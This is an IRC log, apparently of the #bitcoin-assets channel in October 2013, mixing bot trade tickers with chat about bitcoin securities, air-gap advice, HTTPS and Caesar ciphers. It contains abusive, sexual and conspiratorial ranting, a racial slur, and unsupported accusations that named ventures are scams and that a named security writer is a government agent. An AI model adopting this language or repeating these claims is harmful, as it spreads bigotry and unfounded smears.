0.2697 BTC [+] Oct 11 22:26:30 lmao Oct 11 22:30:59 [HAVELOCK] [B] [XBOND] 400 @ 0.0012 = 0.48 BTC [+] Oct 11 22:35:21 .d Oct 11 22:35:22 189281249.28103 | Next Diff in 1109 blocks | Estimated Change: 20.7013% in 6d 2h 32m 47s Oct 11 22:43:18 http://www.theverge.com/2013/10/11/4828352/politifact-launching-punditfact-fact-check-radio-tv-blog-print-personalities Oct 11 22:43:19 PolitiFact launching new site to call out lies of political pundits | The Verge Oct 11 22:43:45 o hey Oct 11 22:57:33 fucking motherfucking fuck Oct 11 22:57:48 visa cancelled my card because i used it while travelling Oct 11 22:57:50 a business card Oct 11 22:58:03 so now i'll have umpteen vendors saying wtf Oct 11 22:58:05 look u stupid fucking cunt Oct 11 22:58:17 this is the end of a regime Oct 11 22:58:29 this regime will fuck you whatever it takes Oct 11 22:58:39 you talking to me? Oct 11 22:58:41 complaining about your fucking visa card Oct 11 22:58:44 gtfo Oct 11 22:58:51 lol gecko hath spoken Oct 11 22:59:07 is the same as complaining to your torturer that keeps u in his basement about the quality of his food Oct 11 22:59:17 youre a fucking idiot Oct 11 22:59:22 when will you stupid mother fucking cunts wake the fuck up? Oct 11 22:59:30 ignored Oct 11 22:59:40 My VISA CARD ISN'T WORJING UUUH HUUH Oct 11 22:59:52 I WANt MY MOTHER UUH UUHHUH Oct 11 23:00:08 gecko_x2 mind your pills Oct 11 23:00:12 jesus fucking christ Oct 11 23:00:23 you just don't get it do you? Oct 11 23:00:25 ThickAsThieves Oct 11 23:00:31 THE FASCISTS ARE REAL Oct 11 23:00:39 THEY ARE REALLY COMING Oct 11 23:00:48 YES THIS IS REAL Oct 11 23:00:59 DO YOU GET IT? Oct 11 23:02:26 whatever Oct 11 23:02:40 ppl just do not understand Oct 11 23:02:59 they say yes i kow the government will fuck me Oct 11 23:03:10 but at the same time they do nothing to prevent it Oct 11 23:03:15 because they WANT IT Oct 11 23:03:36 YOU WANT TO BE FUCKED IN THE ASS BY YOUR GOVERNMENT' Oct 11 23:03:46 THAT IS THE REASON YOU COMPLAIN Oct 11 23:03:59 IF YOU WOULD NOT WANT IT Oct 11 23:04:09 YOU WOULD NOT BE COMPLAINING ON IRC Oct 11 23:04:17 YOU WOULD BE AT WAR Oct 11 23:04:27 LOOK AT YOUR FUCKING HISTORY Oct 11 23:04:33 YES THIS IS REAL Oct 11 23:04:39 YES THEY ARE COMING Oct 11 23:04:46 AND YES THEY WILL KILL YOU Oct 11 23:04:53 'AND YOUR FAMILY TOO Oct 11 23:04:55 IT Oct 11 23:04:56 IS Oct 11 23:04:58 REAL Oct 11 23:05:14 kakobrekla you around? ^^^ Oct 11 23:05:17 i bet if you used allcaps i could read it better Oct 11 23:05:58 what Oct 11 23:06:17 jurov kakobrekla doesn't kick people for allcaps ragin Oct 11 23:06:31 WHY NOT Oct 11 23:06:32 he's still going? Oct 11 23:06:35 awesome Oct 11 23:06:42 no, stopped or paused Oct 11 23:06:43 I DUNNO JUROV Oct 11 23:06:53 KICK ALL THE PEEPL! Oct 11 23:06:58 jcpham do i know you*? Oct 11 23:07:11 YES GECKO YOU KNOW ME Oct 11 23:07:12 do you have anything to explain to me? Oct 11 23:07:17 I WAS INSIDE YOU ONCE Oct 11 23:07:23 YOU SWALLOWED Oct 11 23:07:25 here we go Oct 11 23:07:26 when the fuck did this turn into -otc. Oct 11 23:07:40 <-- still confused :P Oct 11 23:07:42 with the sexual assault, just like the zionist have programmed you Oct 11 23:07:57 wery not well played sir Oct 11 23:08:42 when you feel fear, attack everyone with sexual trigger words Oct 11 23:08:51 !b 100 Oct 11 23:08:52 Last 100 lines bashed and pending review. (http://dpaste.com/1413596/plain/) Oct 11 23:08:56 ill read later Oct 11 23:09:18 "That you or that half-wit Mirca have the gall to post about honesty here is quite the joke. You publicly post scam accusations for sport just to harm your competition. Competition I might add, that summarily spanked you in all things that matter right up until the end." Oct 11 23:09:23 love, burnside Oct 11 23:10:07 https://bitcointalk.org/index.php?topic=125629.msg3228015#msg3228015 Oct 11 23:10:09 [BTC-TC] Virtual Community Exchange [WINDING DOWN] Oct 11 23:10:22 funny how he defined 'the end' Oct 11 23:10:35 being that mpex is not over Oct 11 23:13:38 ya well... the tuna i had for breakfast also spanked me sumariliy in all things that matter. Oct 11 23:13:47 swimming, making good tuna steak, etc. Oct 11 23:24:53 [MPEX] [S.MPOE] 2608 @ 0.00085728 = 2.2358 BTC [+] Oct 11 23:25:38 https://bitcointalk.org/index.php?topic=308924.msg3316281#msg3316281 Oct 11 23:25:40 Why is Operation Fabulous not working? Oct 11 23:25:49 lmao Oct 11 23:26:45 still digging up troll gold on the forums i see Oct 11 23:27:49 that's ditz glitz. Oct 11 23:27:55 i mean, Oct 11 23:27:58 dat's ditz glitz. Oct 11 23:28:08 Hello everyone, new to the scene, here to watch n learn :) Oct 11 23:28:14 hello MTBmanTT. Oct 11 23:29:12 hi Oct 11 23:30:30 hi Oct 11 23:30:38 ThickAsThieves anyway, in case that was before your time, "[17:05:52] shareholder3_ midterm this will win against MPEX and others as they will get shut down soon too" Oct 11 23:30:51 [17:06:13] shareholder1 I already reported MPEX for child porn Oct 11 23:30:52 etc. Oct 11 23:31:01 lol Oct 11 23:31:13 s.cp was a thing? Oct 11 23:31:17 [17:56:20] da2ce796 as in, mpex will stop being our compittion. Oct 11 23:31:17 [17:56:26] shareholder1 mpex will be classified as money launderers and terrorists Oct 11 23:31:40 well, he didnt say WHEN Oct 11 23:31:42 ThickAsThieves the internet kidz have issues in that they imagine the world is congruent with their perception of the world. Oct 11 23:31:54 reality is what you make it! Oct 11 23:32:05 thus therefore the value of bitcoin comes from there being bitcoin atms and the worst thing that can happen is someone "reporting you for child porn" Oct 11 23:32:32 kakobrekla this is true. Oct 11 23:32:53 i like how they say "our" too Oct 11 23:32:55 [17:56:26] shareholder2 really? satoshidice and bitvps look pretty legit to me Oct 11 23:32:55 [17:56:30] shareholder2 bitvps even hosts GLBSE Oct 11 23:32:59 as if they had a stake Oct 11 23:33:05 that thing is the total lolz. Oct 11 23:33:23 [17:56:39] shareholder3_ agree with da2ce7, its a different, larger market the new GLBSE would operate in Oct 11 23:33:33 aw fduck it, just read the transcript. http://trilema.com/2012/the-stockexchange-shareholders-on-welfare/ Oct 11 23:33:37 hehe Oct 11 23:33:38 ima be here picking comedy gold all night Oct 11 23:34:12 is this the one where nefario is on trial for closing? Oct 11 23:34:17 i read most of it once Oct 11 23:34:38 reading that link should bring me up to speed here? Oct 11 23:34:51 in unrelated news, i taught this girl to cook. she loves the power this gives her, so she tries to cook everything now. so for instance can't find halva ? "maybe i'll try cooking some!" Oct 11 23:35:05 im like ya totally, first we build an oil press in the garage... Oct 11 23:35:46 MTBmanTT you have about siox month's worth of reading to get up to speed. Oct 11 23:36:01 but there is a lot on trilema worth reading Oct 11 23:36:02 ...great Oct 11 23:36:02 that link is only relevant in the context of a previous discussion we were having, re some other blown exchange. Oct 11 23:36:07 under the mpex and bitcoin tags Oct 11 23:36:11 some other tags too Oct 11 23:36:12 but you may want to start by reading the chan log Oct 11 23:36:15 kk Oct 11 23:36:27 ty, ill start with that link Oct 11 23:36:40 youll end up needing to pay for a cookie Oct 11 23:39:18 like browser cookie, or go down the street n buy a snack while im reading a while? Oct 11 23:39:55 lol Oct 11 23:40:07 trilema lets you read like 5 articles a week or some shit. i forget exactly. Oct 11 23:41:20 who is this guy/ site "trilema" Ive come across it once before when reading an article on "solarwind" Oct 11 23:41:27 ;;later tell bingoboingo jborkl_ by the way, someone should make a complete history of labcoin. like a post-mortem. all those juicy quotes in the forum and whatnot... splendid story for the future generations. Oct 11 23:41:27 The operation succeeded. Oct 11 23:41:35 i appreciate the help btw :) Oct 11 23:41:35 lmao Oct 11 23:41:36 MTBmanTT some asshole. Oct 11 23:42:47 ah, no shortage of them! Oct 11 23:42:57 lmao#2 Oct 11 23:43:15 !b 15 Oct 11 23:43:16 ty Oct 11 23:43:17 Last 15 lines bashed and pending review. (http://dpaste.com/1413628/plain/) Oct 11 23:43:27 keep it going Oct 11 23:43:32 i need more stuffs Oct 11 23:45:04 this trilema dude needs his head examined Oct 11 23:45:38 maybe even elctro-shock therapy Oct 11 23:45:40 i heard his own court found him guilty Oct 11 23:45:51 no way! Oct 11 23:45:54 so no doubts Oct 11 23:46:06 simple minded psychotic dood. Oct 11 23:46:25 what the hell is a trilema anyways Oct 11 23:46:30 is that when you have three choices Oct 11 23:46:42 it's when you have three choices but just one m. Oct 11 23:46:58 that's terrible luck Oct 11 23:48:16 is there such thing as nilema? Oct 11 23:48:43 no, because niggers don;'t have options. Oct 11 23:48:58 99 problems and a trilema aint one Oct 11 23:49:30 i didnt have teh niggers in mind really Oct 11 23:49:30 better than a quadlema Oct 11 23:49:56 here's a trilemma for y'all : either monucleosis or bisexuality. Oct 11 23:51:55 that depends Oct 11 23:51:59 if bisexuality is permanent Oct 11 23:52:26 speaking of bitcoin finance, anyone here saw cannibal holocaust ? Oct 11 23:52:37 some parts Oct 11 23:52:42 :) Oct 11 23:52:46 kik Oct 11 23:52:56 long ago Oct 11 23:52:57 it Oct 11 23:53:12 's like nature channel with some bits of spice channel spliced in. Oct 11 23:53:23 lol Oct 12 00:04:17 would it be ok, if I were to ask some stupid n00b questions? Oct 12 00:05:10 you mean another one? i kid i kid Oct 12 00:05:26 lol true that Oct 12 00:06:54 is there a site, or link somewhere I can go to,and read up on how a newbie like me doesnt get taken to the cleaners? Some of these scam "companies" are convincing at times- wondering if somene made a post about it Oct 12 00:07:36 ;;google bitcoin drama timeline Oct 12 00:07:38 The Bitcoin Drama Timeline pe Trilema - Un blog de Mircea Popescu.: ; BitCoin Drama Continues After Hours | Zero Hedge: ; Bitcoin bubble burst? Currency suffers dramatic correction | Internet ...: that's an old article. in general your best bet is to lurk here and see what people say. Oct 12 00:07:59 that idiot again Oct 12 00:08:03 hes onto everything. Oct 12 00:08:07 sweet, thank you Oct 12 00:23:51 [MPEX] [S.MPOE] 5050 @ 0.00085737 = 4.3297 BTC [+] {3} Oct 12 00:26:46 stay away from the amazing labcoin for now - not that you could buy shares anyway Oct 12 00:26:46 AMAZING COMPANY! Oct 12 00:28:22 labcoin... Oct 12 00:28:40 just put all your coins in bitbet cold storage Oct 12 00:29:16 no, s.mpoe cold storage.. preferably via coinbr xD Oct 12 00:31:47 isn't it wonderful such a thing (airgapped mpex acct) is fully feasible? Oct 12 00:32:29 i think so. Oct 12 00:45:18 can anyone on bitfunder buy some shares for me and transfer to my acct? I will offer 5 % Oct 12 00:45:29 PM, must be reputable Oct 12 00:48:19 your account on where ? Oct 12 00:52:16 ;;gettrust gsj Oct 12 00:52:17 WARNING: Currently not authenticated. Trust relationship from user jurov to user gsj: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://b-otc.com/stg?source=jurov&dest=gsj | WoT data: http://b-otc.com/vrd?nick=gsj | Rated since: never Oct 12 01:00:44 gsj, transfers to US users are blocked Oct 12 01:00:47 on BF Oct 12 01:29:57 [MPEX] [S.MPOE] 1900 @ 0.00084931 = 1.6137 BTC [-] **** BEGIN LOGGING AT Sat Oct 12 06:17:23 2013 Oct 12 06:19:35 bgupta because one of those is not particularly designed to resist attack. Oct 12 06:20:33 as prev discussed, those things are mostly a teaching tool. the same reason you don't race cars made out of legos, you don't use the openpgp smartcard for actual security. Oct 12 06:23:10 pankkake now that's suspicious. u 100% sure ? Oct 12 06:23:50 yes, I checked, it's mine; however I do know I signed up on BF with it Oct 12 06:24:05 it has only one share Oct 12 06:24:31 still, probably a bug somewhere Oct 12 06:25:13 i c Oct 12 06:28:55 mircea_popescu: discussed previously? In IRC or elsewhere? (My issue with current implementations, is the key lengths they support are too short, but the latest version of the spec seems to address that) Oct 12 06:29:12 i dropped the link as a response to your blog comment, Oct 12 06:29:23 but here it is : http://log.bitcoin-assets.com/?date=09-10-2013#346180 Oct 12 06:30:15 “You are also reminded that any inappropriate remarks or jokes concerning security may result in your arrest” << teh us improves every day lol Oct 12 06:38:54 [HAVELOCK] [AM1] 1 @ 0.92 BTC [+] Oct 12 06:41:05 https://www.schneier.com/blog/archives/2013/10/air_gaps.html this could be of interest to S.NSA :) Oct 12 06:41:06 Schneier on Security: Air Gaps Oct 12 06:44:11 "The advice I shared included using Tor" for the record, that particular tidbit has most people involved in compsec scratching their heads at schneier. Oct 12 06:45:26 " It's impossible to completely avoid connecting the computer to the Internet" Oct 12 06:45:42 heh. bs. tyvm, i'm done reading that crap. Oct 12 06:46:20 for the further record, any piece of hardware that was ever at any point in its life connected to the internet can no longer be used as part of an airgapped system. period. Oct 12 06:47:05 "I downloaded and installed OpenOffice, a PDF reader" no srsly. this is ludicrous. Oct 12 07:05:39 i've stopped using perfectly good pgp keys after absentmindedly connecting the machines holding them to the internet Oct 12 07:05:42 feels bad :( Oct 12 07:07:47 mircea_popescu: i think that's an oxford comma Oct 12 07:07:59 it seems bizzare that Schneier would write something like: " It's impossible to completely avoid connecting the computer to the Internet" Oct 12 07:08:03 cause that's idiotic Oct 12 07:08:27 mod6 yes. Oct 12 07:08:29 "I downloaded and installed a) OpenOffice, b) a PDF reader, c) a text editor, d) TrueCrypt, and e) BleachBit." Oct 12 07:08:31 i am doing a write-up of this, Oct 12 07:08:35 so brb. Oct 12 07:08:41 we can discuss it all after. Oct 12 07:09:03 ok. i am disappoint. the guy wrote one of my all time favorite books: Applied Cryptography Oct 12 07:09:31 his "accessible" writing is weird Oct 12 07:10:29 this whole article is useless Oct 12 07:10:55 "only connect to the internet a little bit, and do all this weird voodoo when you plug foreign usb devices in" Oct 12 07:11:01 great airgap Oct 12 07:11:33 AMAZING VOODOO AIRGAP! Oct 12 07:11:33 AMAZING COMPANY! Oct 12 07:12:15 AMAZING ARTICLE! Oct 12 07:12:16 AMAZING COMPANY! Oct 12 07:22:37 [MPEX] [S.MPOE] 2364 @ 0.00085183 = 2.0137 BTC [-] Oct 12 07:30:07 <[\\\]> amazing comment. Oct 12 07:30:07 AMAZING COMPANY! Oct 12 07:30:14 <[\\\]> assbot is amazing. Oct 12 07:30:20 <[\\\]> amazing assbot. Oct 12 07:30:20 AMAZING COMPANY! Oct 12 07:30:27 <[\\\]> amazing amazing. Oct 12 07:30:27 AMAZING COMPANY! Oct 12 07:30:30 assmazing Oct 12 07:30:33 <[\\\]> amazing amazing amazing. Oct 12 07:30:33 AMAZING COMPANY! Oct 12 07:30:33 AMAZING COMPANY! Oct 12 07:30:41 <[\\\]> you see where I'm going with this.. Oct 12 07:30:51 mazing Oct 12 07:30:52 <[\\\]> it can't end with amazing. Oct 12 07:31:30 ;;seen amazing Oct 12 07:31:31 I have not seen amazing. Oct 12 07:31:31 AMAZING COMPANY! Oct 12 07:31:45 <[\\\]> ,,seen amazing Oct 12 07:31:46 AMAZING COMPANY! Oct 12 07:31:56 <[\\\]> the regex fails on amazing. Oct 12 07:32:03 <[\\\]> "amazing." Oct 12 07:32:14 amazing. you'd think it wouldn't. Oct 12 07:32:20 <[\\\]> :) Oct 12 07:32:26 <[\\\]> stupid special characters Oct 12 07:32:37 amazing\. Oct 12 07:32:42 <[\\\]> heh Oct 12 07:32:46 <[\\\]> amazing\ Oct 12 07:32:50 <[\\\]> amazing! Oct 12 07:32:53 amazing& Oct 12 07:33:01 <[\\\]> anything but a letter or space Oct 12 07:33:03 <[\\\]> amazing1 Oct 12 07:33:16 amazing company Oct 12 07:33:22 <[\\\]> aww Oct 12 07:33:24 <[\\\]> it got killed Oct 12 07:33:33 no, check the character ;) Oct 12 07:34:20 <[\\\]> oh Oct 12 07:34:45 amazing  Oct 12 07:56:10 [MPEX] [S.MPOE] 2286 @ 0.00085183 = 1.9473 BTC [-] Oct 12 08:00:48 nitey nite Oct 12 08:05:32 the thing is Oct 12 08:05:36 its not even a regex! Oct 12 08:05:38 MUAHAHA Oct 12 08:09:23 [HAVELOCK] [NEOBEE] 387 @ 0.00220407 = 0.853 BTC [-] {4} Oct 12 08:10:24 [HAVELOCK] [NEOBEE] 552 @ 0.00204477 = 1.1287 BTC [-] {2} Oct 12 08:12:26 [MPEX] [S.MPOE] 5850 @ 0.00085151 = 4.9813 BTC [-] {2} Oct 12 08:15:52 <[\\\]> amazing kakobrekla Oct 12 08:15:53 AMAZING COMPANY! Oct 12 08:16:32 <[\\\]> amazing kakobrekla is amazing to amazing kakobrekla is amazing to amazing kakobrekla Oct 12 08:16:32 AMAZING COMPANY! Oct 12 08:16:32 AMAZING COMPANY! Oct 12 08:16:32 AMAZING COMPANY! Oct 12 08:16:32 AMAZING COMPANY! Oct 12 08:16:32 AMAZING COMPANY! Oct 12 08:17:03 mod6 http://trilema.com/2013/why-i-suspect-schneier-is-an-us-agent/ Oct 12 08:19:37 the "massive fork" link is broken, characters at the end of the URL Oct 12 08:19:41 a ty Oct 12 08:19:46 ;;calc .1 * .25 Oct 12 08:19:46 0.025 Oct 12 08:20:03 pankkake no ? Oct 12 08:20:15 ;;calc .235 / .25 Oct 12 08:20:16 0.94 Oct 12 08:20:17 go to sleep you yuropeans you Oct 12 08:20:19 I still have http://trilema.com/2013/the-bitchslapping-of-2013/%E2%80%8E Oct 12 08:20:26 ;;calc .025 / .25 Oct 12 08:20:26 0.1 Oct 12 08:20:44 ;;calc .25 - .025 Oct 12 08:20:45 0.225 Oct 12 08:21:35 i see ok a massive fork in teh source Oct 12 08:22:46 (i swear i haven't changed it since, but maybe you got a messy page ?) Oct 12 08:23:35 well, I see a weird character too: http://i.imgur.com/TWqJC8D.png Oct 12 08:23:36 o hey smidge is 30 min late Oct 12 08:24:38 3/‎" Oct 12 08:24:42 fuck me yiou Oct 12 08:24:45 're right ? wtf! Oct 12 08:26:42 thanks for pointing it out. Oct 12 08:39:49 i like your analysis of that article by schneier. Oct 12 08:40:03 its like "PDF Reader?!" .. wave in the trojans plz! Oct 12 08:41:03 well in his defense, he might have been stuck with it on account of whatever the snowden bundle contained. Oct 12 08:41:06 and yah, i do happen to like the GEOM encrypted file system layer to freebsd, more so than probably the linux one. maybe im just more clued on that one. but its no substitute for gpg'ing every damn file. Oct 12 08:41:15 i would have just used a converter personally, but hey. sometimes you're stuck. Oct 12 08:41:24 we know the leak involved stupid shit like pps etc. Oct 12 08:41:48 yah. lot of damn pps. who the fuck uses pps these days anyway? oh yah, big corps and usg. Oct 12 08:41:57 what do you like about geom? (I use both the freebsd and linux one) Oct 12 08:42:05 i dunno what sort of intel community this is, on pps. it boggles. Oct 12 08:42:59 hmm I think I use GELI actually Oct 12 08:45:52 i thought that was block based Oct 12 08:47:53 i guess i just like how you can slice and dice with it, and stackable. self-destruct is neat for orphans too. Oct 12 08:50:04 [MPEX] [S.MPOE] 3669 @ 0.00085202 = 3.1261 BTC [+] Oct 12 08:51:08 pankkake i know where the crazy character came from, too. it's on google results pages, after the url of results. Oct 12 08:52:23 and these days, i agree with mp, if you want to feel good about it, gpg every file with your own key. Oct 12 08:52:42 there are a bunch of gems in that article Oct 12 08:52:44 anyway, anyone know this tails thing ? Oct 12 08:52:49 seems like a sort of urbit ? Oct 12 08:53:09 it's a live cd, which forces everything to go through tor Oct 12 08:53:19 o that Oct 12 08:53:38 with a bunch of stuff preconfigured, it has i2p too Oct 12 08:53:57 never heard of / used it until now. here's the ws: https://tails.boum.org/ Oct 12 08:53:58 you've got to try it at least for the "camouflage" mode, it makes it look like windows xp ;) Oct 12 08:55:15 so basically is repackaged deb with some network rewrites ? Oct 12 08:55:38 yes. as a throwaway OS / live cd Oct 12 08:56:28 not a bad idea in principle. Oct 12 08:59:17 [HAVELOCK] [AM1] 1 @ 0.92 BTC [+] Oct 12 09:00:14 [HAVELOCK] [AM100] 230 @ 0.00850006 = 1.955 BTC [-] {3} Oct 12 09:00:15 [HAVELOCK] [HIM] 3 @ 0.04200001 = 0.126 BTC [-] Oct 12 09:00:16 [HAVELOCK] [KCIM] 3 @ 0.095 = 0.285 BTC [+] Oct 12 09:01:15 [HAVELOCK] [VTX] 1 @ 0.37010007 BTC [-] Oct 12 09:02:16 [HAVELOCK] [AM1] 1 @ 0.92 BTC [+] **** BEGIN LOGGING AT Sat Oct 12 13:31:00 2013 Oct 12 13:55:03 [MPEX] [S.MPOE] 4300 @ 0.00084829 = 3.6476 BTC [-] {2} Oct 12 14:05:40 <_Neil> mircea_popescu: What is a private bet? Your website mentions it when proposing bets, with no explanation I could find whatsoever Oct 12 14:05:57 you enter a pw when you create it, and only people with the pw can bet. Oct 12 14:06:14 <_Neil> Who can see such bets? Oct 12 14:06:36 <_Neil> So effectively bitbet is an escrow service? Oct 12 14:07:40 <_Neil> Your lack of usage of HTTPS on bitbet.us is a little concerning. Who would know if there was an MITM attack against your site, which replaced legitimate funding addresses with a scammer's address? Oct 12 14:09:36 in principle you can edit your hosts file and avoid dns altogether. Oct 12 14:09:39 that good enough ? Oct 12 14:10:05 <_Neil> No not really. Avoiding HTTPS just for the ability to claim it's unnecessary isn't really a goal. Oct 12 14:11:03 <_Neil> It's only a matter of time. You of all people, Mircea, know that. Oct 12 14:11:37 i don't think it is a goal tbh. Oct 12 14:11:49 <_Neil> OK, that's good. Oct 12 14:12:11 i mean, youy have to realise, my technical involvement in bitbet is modest, i mostly do business stuff for it. Oct 12 14:12:28 explain to me how the ip based mitm attack works and how https mitigates it ? Oct 12 14:12:45 <_Neil> Sure. But you're the entrpreneur and owner. You have a substantial stake in its reputation. Oct 12 14:13:25 <_Neil> Unless something's end-to-end encrypted I can't really trust it. It's that simple. It's not my job as an honest person to figure out how to break it. I know it's been done many times. Oct 12 14:13:59 <_Neil> s/owner/substantial owner/ Oct 12 14:14:39 this is a point. the problem with https is that it doesn't REALLY deliver that end to end promise. Oct 12 14:14:44 it just makes a show as if it has. Oct 12 14:14:56 <_Neil> And surely you wouldn't suggest that the only way to use bitbet safely, even assuming it were safe, is for users to screw around with host files on their machine. Oct 12 14:15:01 someone craks the tls (which HAS been done), comes and mitm's bitbet with https just fine Oct 12 14:15:24 well, IPs are difficult to fake. domain names not so. this is a thing of the internet, i didn't make it that way Oct 12 14:15:41 <_Neil> It makes it a lot harder, and more expensive such that joe blow can use it with reasonable confidence. Oct 12 14:15:43 sadly ips aren't impossible to fake, either, especially by a locakl attacker Oct 12 14:16:15 anyway, the point you bring isn't without merit in any case. Oct 12 14:16:24 <_Neil> Your target audience, ultimately, goes beyond techno-geeks I hope. Oct 12 14:16:32 yeah. Oct 12 14:16:49 <_Neil> OK. Just wanted to make the point. I'm happy. Thanks for listening. Oct 12 14:28:07 _Neil to answer your original question : an judged escrow service. people could, in principle, use bitbet private bets to resolve disputes of the nature the rota was supposed to resolve. Oct 12 14:33:44 mircea_popescu, you are the man with a lot of knowledge, if you were to estimate a price for http://altcointicker.com (domain + website) what would you say? Oct 12 14:34:19 i don't think it's worth anything honestly. Oct 12 14:34:27 Fair enough. Oct 12 14:34:31 Not even for the domain name? Oct 12 14:35:58 well whatever they're worth, .1 btc Oct 12 14:46:53 [MPEX] [S.MPOE] 2200 @ 0.00084866 = 1.8671 BTC [+] {2} Oct 12 14:55:01 [HAVELOCK] [B] [XBOND] 1000 @ 0.0011994 = 1.1994 BTC [-] {3} Oct 12 15:00:06 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 12 15:01:05 http://www.reddit.com/r/litecoin/comments/1o3fdz/we_are_the_litecoin_dev_team_ama/ Oct 12 15:06:12 [HAVELOCK] [SMG] 1035 @ 0.00019 = 0.1967 BTC [-] Oct 12 15:19:30 lol I actually have that one share in first my bitfunder account Oct 12 15:19:46 the one where weexchange never worked Oct 12 15:20:00 I even have some satoshi divs Oct 12 15:22:42 Error: Google 2-Factor MUST be enabled to transfer shares. Oct 12 15:22:45 eh… Oct 12 15:22:51 stupid website Oct 12 15:25:31 [MPEX] [S.MPOE] 3500 @ 0.0008477 = 2.967 BTC [-] Oct 12 15:38:44 [MPEX] [S.MPOE] 1850 @ 0.0008504 = 1.5732 BTC [+] Oct 12 16:09:15 [MPEX] [S.MPOE] 5550 @ 0.0008504 = 4.7197 BTC [+] Oct 12 16:11:17 [HAVELOCK] [AM1] 30 @ 0.90113332 = 27.034 BTC [-] {4} Oct 12 16:28:33 [MPEX] [S.MPOE] 3950 @ 0.00085043 = 3.3592 BTC [+] {2} Oct 12 16:38:43 [HAVELOCK] [AM1] 1 @ 0.88 BTC [-] Oct 12 16:39:23 ;;bc,stats Oct 12 16:39:25 Current Blocks: 263136 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 959 blocks | Next Difficulty In About: 4 days, 22 hours, 1 minute, and 50 seconds | Next Difficulty Estimate: 233536013.713 | Estimated Percent Change: 23.38043 Oct 12 16:51:43 In April 2006, fugitive Mafia boss Bernardo Provenzano was captured in Sicily partly because some of his messages, written in a variation of the Caesar cipher, were broken. Provenzano's cipher used numbers, so that "A" would be written as "4", "B" as "5", and so on. Oct 12 16:51:59 fucking retards. using caesar ciphers in 2006. Oct 12 16:52:18 In 2011, Rajib Karim was convicted in the United Kingdom of "terrorism offences" after using the Caesar cipher to communicate with Bangladeshi Islamic activists discussing plots to blow up British Airways planes or disrupt their IT networks. Oct 12 16:52:34 Although the parties had access to far better encryption techniques (Karim himself used PGP for data storage on computer disks), they chose to use their own scheme(implemented in Microsoft Excel), rejecting a more sophisticated code program called Mujhaddin Secrets "because 'kaffirs', or non-believers, know about it, so it must be less secure". Oct 12 16:55:25 <_Neil> lol Oct 12 16:59:43 The enemy of my enemy is my friend? Oct 12 17:00:33 more like "jesus saves" Oct 12 17:00:54 obviously whities could not have figured out on their own this brilliant "shift letters" technique Oct 12 17:01:06 [HAVELOCK] [HIM] 2 @ 0.08899993 = 0.178 BTC [+] Oct 12 17:02:06 [MPEX] [S.MPOE] 4650 @ 0.00085048 = 3.9547 BTC [+] Oct 12 17:04:02 MtGox BTCUSD ticker | Best bid: 141.00609, Best ask: 142.05000, Bid-ask spread: 1.04391, Last trade: 142.05000, 24 hour volume: 9710.62684698, 24 hour low: 139.10000, 24 hour high: 142.98700, 24 hour vwap: 141.16892 Oct 12 17:04:20 6368 Oct 12 17:05:36 anyone still holding out hope for activemining? Oct 12 17:07:06 i have havelock but tempted to get rid of it before inevitable US crackdown Oct 12 17:07:11 HIM Oct 12 17:11:02 hope as to what ? Oct 12 17:11:17 it's trading slightly above the girl's estimation, what'd you hope ? Oct 12 17:14:00 what estimation? aren't you confusing it with asicminer? Oct 12 17:15:16 ow fuck. Oct 12 17:15:17 activemining's the altcompany Oct 12 17:15:29 i can't believe someone's even asking about that still lol. Oct 12 17:15:48 naemsi what us crackdown dood ? it's a scam. forget about it. Oct 12 17:17:21 [MPEX] [S.MPOE] 9885 @ 0.00084747 = 8.3772 BTC [-] {2} Oct 12 17:18:36 HIM is scam or havelock is a scam? Oct 12 17:19:24 weren't you asking about activemining ? Oct 12 17:20:23 well, it was two questions. I'm thinking to get out of HIM before crackdown, but don't know if anything concrete came out of activemining yet (I'm not on top of the news). Oct 12 17:20:59 If activemining was worth anything, i might move some over to that, otherwise stay out. Oct 12 17:21:24 just thinking out loud really. Oct 12 17:21:37 activemining isn't worth anything. him i have no idea, who runs it ? Oct 12 17:21:54 it's only available on havelock is the problem Oct 12 17:22:10 and havelock made some noise about a big announcement coming which doesn't sound good. Oct 12 17:23:22 maybe a better question is, what do people around here own ? :) Oct 12 17:23:58 bitcoinds Oct 12 17:24:00 I own s.mpoe shares :) Oct 12 17:24:03 _is_ there anything worth owning atm Oct 12 17:24:37 http://trilema.com/2013/bitcoin-assets-rules-and-regulations/ Oct 12 17:24:38 #bitcoin-assets rules and regulations pe Trilema - Un blog de Mircea Popescu. Oct 12 17:24:40 see #2 there. Oct 12 17:24:58 sorry, i'm dumb Oct 12 17:25:26 ThickAsThieves, how many shares of asicminer does asicminer-pt represent on all exchanges combined? Oct 12 17:29:19 i'd like to say asking around here is part of doing homework since I know people here are generally contrarian. but sorry if I broke the rules Oct 12 17:29:21 51890.7 if you count BTCT Oct 12 17:30:22 25541.4 if you do not Oct 12 17:31:26 once the latest migration is out only 6.4% of shares will be represented Oct 12 17:32:26 or, roughly 15.4% of the publicly held shares Oct 12 17:32:50 how come there are fractions? Oct 12 17:32:50 naemsi dun worry. Oct 12 17:33:08 ThickAsThieves ya srsly ?! is this from your fractional pt thing ? Oct 12 17:33:26 yeah Oct 12 17:33:29 also, Oct 12 17:33:35 ;;calc 200000* .154 Oct 12 17:33:36 30800 Oct 12 17:33:41 the math doth not work ? Oct 12 17:34:10 the math is not clear for you because you dont know how many AM-PT shares I hold that are represented in other PTs Oct 12 17:34:14 from people migrating Oct 12 17:34:32 but i mean, the publicly held chunk is 200k. Oct 12 17:34:36 no Oct 12 17:34:39 o ? Oct 12 17:34:44 it;s roughly 165k Oct 12 17:34:54 a they never resolved that last bit yeah. nm. Oct 12 17:35:39 [MPEX] [S.MPOE] 4700 @ 0.00084709 = 3.9813 BTC [-] Oct 12 17:40:17 kinda amazing how few shares represent the market price Oct 12 17:40:17 AMAZING COMPANY! Oct 12 17:40:25 lol Oct 12 17:41:25 indeed. Oct 12 17:43:47 [MPEX] [S.MPOE] 2050 @ 0.00084904 = 1.7405 BTC [+] {2} Oct 12 18:02:06 [MPEX] [S.MPOE] 19400 @ 0.00085176 = 16.5241 BTC [+] {6} Oct 12 18:19:22 [HAVELOCK] [VTX] 1 @ 0.37010007 BTC [-] Oct 12 18:20:23 [HAVELOCK] [VTX] 3 @ 0.37010007 = 1.1103 BTC [-] {3} Oct 12 18:24:27 [HAVELOCK] [VTX] 1 @ 0.37010007 BTC [-] Oct 12 18:41:44 [MPEX] [S.MPOE] 6400 @ 0.00084646 = 5.4173 BTC 